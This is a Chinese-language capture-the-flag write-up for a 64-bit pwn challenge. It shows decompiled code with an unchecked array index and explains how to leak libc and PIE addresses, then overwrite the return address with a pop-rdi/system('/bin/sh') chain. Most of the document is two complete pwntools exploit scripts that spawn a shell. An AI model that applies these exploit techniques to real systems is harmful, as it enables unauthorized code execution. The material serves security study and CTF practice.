题目主要代码如下
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
char s; // [rsp+0h] [rbp-110h]
unsigned __int64 v5; // [rsp+108h] [rbp-8h]
v5 = __readfsqword(0x28u);
setbuf(stdout, 0LL);
setbuf(stdin, 0LL);
setbuf(stderr, 0LL);
memset(&s, 0, 0x100uLL);
printf("input your name \nname:", 0LL);
read(0, &s, 0x100uLL);
while ( (unsigned int)sub_B35() )
;
return 0LL;
}
_BOOL8 sub_B35()
{
int v1; // [rsp+4h] [rbp-15Ch]
int v2; // [rsp+8h] [rbp-158h]
int i; // [rsp+Ch] [rbp-154h]
char v4[64]; // [rsp+10h] [rbp-150h]
char s; // [rsp+50h] [rbp-110h]
unsigned __int64 v6; // [rsp+158h] [rbp-8h]
v6 = __readfsqword(0x28u);
memset(&s, 0, 0x100uLL);
memset(v4, 0, 0x28uLL);
for ( i = 0; i <= 40; ++i )
{
puts("input index");
__isoc99_scanf("%d", &v1);
printf("now value(hex) %x\n", (unsigned int)v4[v1]);
puts("input new value");
__isoc99_scanf("%d", &v2);
v4[v1] = v2;
}
puts("do you want continue(yes/no)? ");
read(0, &s, 0x100uLL);
return strncmp(&s, "yes", 3uLL) == 0;
}
再查看一下保护,开启了
但是看到函数sub_B35中数组指针中v1大小没有受到限制,便可以对内存任意地址进行读写。
于是可以读取__libc_start_main的函数的地址,通过此泄露libc的版本获取system函数的地址,并将其写在返回地址上。
于是就只差最后一步参数问题的解决了。由于程序是64位程序参数必须放在寄存器rdi中,我们查询一下pop rdi
由于开启了PIE保护,这里显示的只是偏移,需要泄露一个函数的地址之后计算偏移差即可,这里选择泄露main函数
在泄露的时候需要注意,该程序打印的是无符号整形,而数组是char类型 如果打印B7他的byte就是-73打印出无符号整形就是FFFFFFB7,所以需要对其进行截断。如果打印出一个字符需要前面补0
exp如下
#!/usr/bin/env python
# coding=utf-8
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import *
p=process('./pwn')
#p = remote("1b190bf34e999d7f752a35fa9ee0d911.kr-lab.com","57856")
elf=ELF('./pwn')
#context.log_level='debug'
context.terminal=['deepin-terminal','-x','sh','-c']
libc=ELF('./libc.so.6')
offset_libc_start_main_0xE7=0X278
libc_start_main_0xE7_addr=''
p.recvuntil("name:")
p.sendline('playmaker')
for x in range(8):#leak the addr of libc
p.recvuntil('input index\n')
p.sendline(str(offset_libc_start_main_0xE7+x))
p.recvuntil('(hex) ')
data=p.recvuntil('\n',drop=True)
#print data
if len(data)>=2:
data=data[-2:]
data=data[::-1]
elif len(data)==1:
data='0'+data
data=data[::-1]
libc_start_main_0xE7_addr+=data
p.recvuntil('input new value\n')
p.sendline('0')
libc_start_main_0xE7_addr=libc_start_main_0xE7_addr[::-1]
libc_start_main_0xE7_addr=eval("0x"+libc_start_main_0xE7_addr)
libc_start_main_addr=libc_start_main_0xE7_addr-0xE7
#print hex(libc_start_main_0xE7_addr)
#print hex(libc_start_main_addr)
main_addr_AC=''
offset_retn=0x158
for x in range(8):#leak the addr of main_AC
p.recvuntil('input index\n')
p.sendline(str(offset_retn+x))
p.recvuntil('(hex) ')
data=p.recvuntil('\n',drop=True)
if len(data)>=2:
data=data[-2:]
data=data[::-1]
elif len(data)==1:
data='0'+data
data=data[::-1]
main_addr_AC+=data
p.recvuntil('input new value\n')
p.sendline('0')
main_addr_AC=main_addr_AC[::-1]
main_addr_AC=eval('0x'+main_addr_AC)
main_addr=main_addr_AC-0xac
print hex(main_addr)
pop_rdi=main_addr+0xd03-0xa65
print hex(pop_rdi)
#libc=LibcSearcher('__libc_start_main',libc_start_main_addr)
base_addr=libc_start_main_addr-libc.symbols['__libc_start_main']
system_addr=libc.symbols['system']+base_addr
bin_sh_addr=base_addr+libc.search('/bin/sh').next()
print hex(libc_start_main_addr)
print hex(system_addr)
print hex(bin_sh_addr)
payload=p64(pop_rdi)+p64(bin_sh_addr)+p64(system_addr)
payload=payload.encode("hex")
for x in range(24):
p.recvuntil('input index\n')
p.sendline(str(offset_retn+x))
p.recvuntil('input new value\n')
p.sendline(str(eval("0x"+payload[x*2:x*2+2])))
for x in range(1):
p.recvuntil('input index\n')
p.sendline('0')
p.recvuntil('input new value\n')
p.sendline('0')
p.recv()
#gdb.attach(p)
p.sendline('yes')
sleep(2)
p.interactive()
其实这题也不需要泄露函数地址亦可以拿到shell,在最后返回地址处执行system,设置他上一个函数strncmp的参数为‘/bin/sh’,到system时rdi还没有改变。便可以成功拿到shell
#!/usr/bin/env python
# coding=utf-8
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import *
p=process('./pwn')
#p = remote("1b190bf34e999d7f752a35fa9ee0d911.kr-lab.com","57856")
elf=ELF('./pwn')
#context.log_level='debug'
context.terminal=['deepin-terminal','-x','sh','-c']
libc=ELF('./libc.so.6')
offset_libc_start_main_0xE7=0X278
libc_start_main_0xE7_addr=''
p.recvuntil("name:")
p.sendline('playmaker')
for x in range(8):#leak the addr of libc
p.recvuntil('input index\n')
p.sendline(str(offset_libc_start_main_0xE7+x))
p.recvuntil('(hex) ')
data=p.recvuntil('\n',drop=True)
#print data
if len(data)>=2:
data=data[-2:]
data=data[::-1]
elif len(data)==1:
data='0'+data
data=data[::-1]
print data
libc_start_main_0xE7_addr+=data
p.recvuntil('input new value\n')
p.sendline('0')
libc_start_main_0xE7_addr=libc_start_main_0xE7_addr[::-1]
libc_start_main_0xE7_addr=eval("0x"+libc_start_main_0xE7_addr)
libc_start_main_addr=libc_start_main_0xE7_addr-0xE7
#print hex(libc_start_main_0xE7_addr)
#print hex(libc_start_main_addr)
offset_retn=0x158
#for x in range(8)#leak the addr of main_
#libc=LibcSearcher('__libc_start_main',libc_start_main_addr)
base_addr=libc_start_main_addr-libc.symbols['__libc_start_main']
system_addr=libc.symbols['system']+base_addr
bin_sh_addr=base_addr+libc.search('/bin/sh').next()
print hex(libc_start_main_addr)
print hex(system_addr)
print hex(bin_sh_addr)
payload=p64(system_addr)+p64(0xdeadbeef)
payload=payload.encode("hex")
for x in range(16):
p.recvuntil('input index\n')
p.sendline(str(offset_retn+x))
p.recvuntil('input new value\n')
p.sendline(str(eval("0x"+payload[x*2:x*2+2])))
for x in range(17):
p.recvuntil('input index\n')
p.sendline('0')
p.recvuntil('input new value\n')
p.sendline('0')
p.recv()
#gdb.attach(p)
p.sendline('/bin/sh')
sleep(2)
p.interactive()
